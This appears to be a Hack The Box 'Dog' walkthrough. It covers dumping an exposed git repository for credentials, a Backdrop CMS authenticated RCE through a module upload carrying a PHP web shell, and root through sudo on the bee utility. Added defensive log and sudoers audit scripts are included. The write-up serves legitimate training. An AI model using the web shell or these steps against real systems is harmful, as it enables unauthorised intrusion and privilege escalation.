HTB Dog Walkthrough
An nmap scan of the target IP 10.10.11.58 finds ports 22 and 80 open. git-dumper is used to pull the contents of the exposed git repository and obtain database credentials. A Backdrop CMS RCE vulnerability gives a shell as the www-data user. User enumeration and the bee tool lead to root, and finally root.txt. 2025-8-10 05:30:27 Author: infosecwriteups.com

We use nmap to discover open ports and services. Initially we use only the -sV option together with -p- to check all ports, without making the scan too long by adding further options.

nmap -sV -p- 10.10.11.58
  • -sV : Detect the service and version which is running.
  • -p- : Run the scan on all ports

nmap basic scan

Now that we know only two ports are open, we use the -p option for those two ports and add the -sC option.

nmap -p22,80 -sV -sC 10.10.11.58
  • -sC : Run a default set of NSE scripts to get information about the open services.

SSH Version -> 8.2p1 Ubuntu 4Ubuntu0.12
HTTPD Version -> 2.4.41

nmap reports a git repository, thanks to the presence of the .git directory. We also get a lot of Disallow entries from robots.txt. Let's enumerate these two findings next 🙂.

Port 80 hosts what looks like a blog about dogs with a number of posts. There is a login page too, but we do not have any credentials yet. There is a username dogBackDropSystem, which we note down for further enumeration if needed. We also see the domain dog.htb on the ABOUT page, which could be useful later on.

DOG home page

domain

The CMS seems to be Backdrop CMS, as shown at the bottom of the home page. Maybe we can find some exploits for this CMS? 🤔
But we don't know the version of Backdrop yet, so let's enumerate a bit more for now.

Backdrop CMS

Running gobuster to search for directories did not reveal much beyond some paths already shown in nmap's robots.txt output.

gobuster dir -u http://10.10.11.58:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  • dir : Uses directory/file enumeration mode
  • -u : The target URL
  • -w : The wordlist to use

gobuster

2.1 Git repository enumeration

Since we know there is a git repository hosted at the web root, we can try to retrieve its contents with the git-dumper tool.

git-dumper is used to dump a git repository’s content from a website.

We install git-dumper and run it using the below commands. Do check out the usage of the tool if you would like to see its options.

git clone https://github.com/arthaud/git-dumper.git # Clone git-dumper
cd git-dumper/
mkdir output-dir # Creating a directory for storing the dumped data
pip3 install -r requirements.txt # Install required packages before running
python3 git-dumper.py http://10.10.11.58:80/.git/ output-dir # Get the content and store it in the output-dir

install git-dumper

run git-dumper

Great, now we have the repository contents of the Backdrop CMS. The structure of the extracted content is similar to the official GitHub repository of Backdrop. Take a look at the two below (extracted content on the left vs the official GitHub repository on the right).

Extracted content VS official github repository

We check the extracted content for anything useful and come across the information below in settings.php. We now have some DB credentials we can use 🙂.

settings.php credentials

We try the usernames below with the password on the login page, but they do not work. We still need a valid username to go with the DB password we found 🫠.

username -> root, dogBackDropSystem , anonymous
password -> BackDropJ2024DS2024

2.2 Backdrop enumeration and login

Part 1 of scratching my head……….

Initially, I thought that hunting for the username was not the right way to go and started looking for the Backdrop version instead.
Since we had the repository contents with us, maybe the version was somewhere in there?

We find the version of Backdrop to be 1.27.1 🥳. Now let's see if we can find any exploits for it. Searching Google, we find an RCE for this version on Exploit-DB, but it is an authenticated RCE, so we need credentials. Back to square one we go 🫠.

Part 2 of scratching my head……….

Remember the domain dog.htb we found earlier. We Ctrl+F for it in the extracted repository content to see if we can find any information, and we find [email protected].

We try this email as the username together with the DB password, and we log in successfully 🥳.

Now let's check out the authenticated RCE exploit we found earlier.

2.3 Backdrop exploit and Shell

Alright, what is the exploit all about? I have simplified it below:

  1. Backdrop lets admins upload ZIP/TAR.GZ files to install new modules using the /admin/modules/install page.
  2. These ZIP/TAR.GZ files get extracted into the server’s modules/ folder, but the system doesn’t properly check what’s inside.
  3. An attacker can create a fake module that contains a PHP web shell (a hidden script that can run system commands).
  4. The attacker uploads this TAR.GZ file, and the CMS installs it like a normal module.
  5. Once uploaded, the attacker can visit the web shell URL({BASE_URL}/modules/shell/shell.php?cmd=<>) and run any system command on the server, gaining remote access.

Do read the Python script on Exploit-DB to see how it generates the module and its format, and also this LinkedIn post, which summarises how the exploit works 🙂.
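
Seen from the defender's side, the chain above leaves two traces in the web server log: a burst of successful requests under /.git/ (what git-dumper produces) and a PHP file under modules/ being called with cmd= shortly after a POST to /admin/modules/install. The following is an added example, not code from the original post, that flags both patterns in Apache combined-format access-log lines; the client IPs and the sample lines are constructed.

```python
import re
from collections import defaultdict

# Apache "combined" access-log line: client IP, two ignored fields, timestamp,
# request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
GIT_RE = re.compile(r'^/\.git(/|$)')                  # repository files being fetched
INSTALL_RE = re.compile(r'^/admin/modules/install')   # Backdrop manual module installer
WEBSHELL_RE = re.compile(r'^/modules/[^/]+/[^/?]+\.php\?.*\bcmd=')  # PHP under modules/ given cmd=

def analyse(lines, git_threshold=3):
    """Return (client_ip, finding) tuples for the two attack patterns this page describes."""
    findings, git_hits, used_installer = [], defaultdict(int), set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # tolerate malformed lines instead of aborting the run
        ip, method, path, status = m['ip'], m['method'], m['path'], int(m['status'])
        if status == 200 and GIT_RE.match(path):
            git_hits[ip] += 1  # a dump tool fetches HEAD, config, index, objects... in a burst
        if method == 'POST' and INSTALL_RE.match(path):
            used_installer.add(ip)
        if WEBSHELL_RE.match(path):
            # upload via the installer followed by execution from the same client is the full chain
            sev = 'critical' if ip in used_installer else 'high'
            findings.append((ip, f'{sev}: possible web shell call {path}'))
    for ip, n in git_hits.items():
        if n >= git_threshold:
            findings.append((ip, f'high: {n} successful requests under /.git/ (repository dump?)'))
    return findings

# Constructed sample log (not from the box): the first five lines mirror the
# walkthrough's steps (git-dumper, module upload, shell.php?cmd=), the rest is noise.
SAMPLE_LOG = """\
198.51.100.9 - - [10/Aug/2025:05:00:01 +0000] "GET /.git/HEAD HTTP/1.1" 200 23
198.51.100.9 - - [10/Aug/2025:05:00:01 +0000] "GET /.git/config HTTP/1.1" 200 137
198.51.100.9 - - [10/Aug/2025:05:00:02 +0000] "GET /.git/index HTTP/1.1" 200 40210
198.51.100.9 - - [10/Aug/2025:05:12:40 +0000] "POST /admin/modules/install HTTP/1.1" 302 -
198.51.100.9 - - [10/Aug/2025:05:12:55 +0000] "GET /modules/shell/shell.php?cmd=id HTTP/1.1" 200 54
192.0.2.7 - - [10/Aug/2025:05:13:00 +0000] "GET /about HTTP/1.1" 200 8812
garbage that is not a log line
"""

if __name__ == '__main__':
    for ip, finding in analyse(SAMPLE_LOG.splitlines()):
        print(ip, finding)
```

Blocking /.git/ at the web server and watching for module installs outside change windows are the corresponding preventive controls; the script only shows what the post-hoc evidence looks like.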

Okay, let's use the exploit to generate the module in the shell.tar.gz file. I have modified the PHP code within the Python script to the below:

<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

Next, let's upload this module using the manual installation method in Backdrop.

Alright, now let's go to the URL and execute this PHP code. Great, we have RCE 🫡.

The shell module we installed keeps getting deleted, so we only have time to run one command before we have to re-upload the module (see the POST ROOT BONUS 5.1 section at the end for why the module keeps getting deleted 😉).

So we take the reverse shell payload below, URL-encode it and send it as the value of the cmd GET parameter.

We set up a listener on our machine and get back a shell as the www-data user 🥳.

3.1 User enumeration and the bee binary

Great, as the www-data user we enumerate the file system looking for misconfigurations or privilege escalation vectors. We find two users, johncusack and jobert. The first one has the user.txt flag, so we need to escalate privileges to johncusack first.

While going through the file system, we find an interesting directory at /backdrop_tool/bee. This seems to refer to the bee command line utility from the GitHub repo here.

Bee is a command line utility for Backdrop CMS. It includes commands that allow developers to interact with Backdrop sites.

The bee utility has an option to run PHP code and scripts, which is interesting, but it is not very useful at the moment because we are still running as the www-data user. Let's park this for now and see if it becomes useful later on 🤔.

3.2 Privilege escalation and user.txt

We run linpeas.sh and don't find anything relevant for privilege escalation. Again it seems like a dead end as the www-data user, so I stepped back and tried the root database password from earlier against the two new usernames we had found.

Bingo! We successfully log in as the johncusack user 🥳.

Ideally, we now have to find a way to escalate our privileges to the jobert or root user. Before that, let's grab our user.txt flag.

user.txt -> d4937***************************

Let's try to escalate our privileges to root. As the johncusack user, running sudo -l gives us the output below:

Ahh the bee comes back to sting us again🫡.

We can run the bee command as any user (ALL) and any group (ALL) via sudo. Let's see if we can run PHP commands as the root user.

Running the commands below with sudo did not work due to an error. Maybe bee is not able to find the Backdrop installation it needs? 🤔

We move to the /var/www/html directory, where Backdrop is hosted, and run the id command to check whether we are root. It works.

We can use bee's php-script command to run a PHP script directly instead of passing commands on the command line. We put a bash reverse shell payload inside shell.php and run it with bee.

# Get shell.php from local machine
scp shell.php [email protected]:/tmp
# Run the shell.php as a root user using the bee utility
sudo bee php-script /tmp/shell.php
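
The lesson of this rule is that sudo rights on a tool with a php-script command are sudo rights on PHP itself, and therefore root. As an added example that is not part of the walkthrough, the audit below parses sudoers-style rules and flags those that hand out code execution; the binary path /usr/local/bin/bee, the other rules and the cache-clear subcommand are constructed assumptions rather than values from the box.

```python
import os
import re
import shlex

# Programs whose ordinary job is to run code supplied by the caller.  A sudo rule on
# any of them grants the run-as user's full rights, whatever the rule intended; bee
# is included because of the php-script / PHP-eval commands described above.
CODE_EXEC_TOOLS = {'bee', 'php', 'python', 'python3', 'perl', 'ruby', 'node', 'bash', 'sh'}

# user host=(runas[ : group]) [TAG:]... command[, command...]
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$'
)

def audit_sudoers(text):
    """Return (user, command, severity, reason) for rules that hand out code execution."""
    findings = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line or line.startswith('Defaults'):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # aliases and other directives are outside this check
        who, runas = m['who'], m['runas'].strip()
        for cmd in (c.strip() for c in m['cmds'].split(',')):
            if cmd == 'ALL':
                findings.append((who, cmd, 'critical', f'any command as ({runas})'))
                continue
            parts = shlex.split(cmd)
            tool = os.path.basename(parts[0])
            if tool not in CODE_EXEC_TOOLS:
                continue
            if len(parts) == 1:
                # bare binary: sudo accepts any arguments, so any script runs as the run-as user
                findings.append((who, cmd, 'critical', f'{tool} with free arguments as ({runas})'))
            else:
                findings.append((who, cmd, 'review', f'{tool} with fixed arguments; confirm they cannot load code'))
    return findings

# Constructed sample, not the box's real file: the johncusack rule is modelled on the
# sudo -l output the walkthrough describes; the path and the other rules are hypothetical.
SAMPLE_SUDOERS = """\
Defaults env_reset
johncusack ALL=(ALL : ALL) /usr/local/bin/bee
webadmin ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
backup ALL=(root) /usr/local/bin/bee cache-clear
"""
```

audit_sudoers(SAMPLE_SUDOERS) rates the johncusack rule critical and the argument-restricted bee rule for review, while the fixed systemctl rule passes.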

We get a shell as the root user and can read root.txt 🥳.

root.txt -> d4857***************************


Source: https://infosecwriteups.com/htb-dog-walkthrough-2d840513f463?source=rss----7b722bfd1b8d---4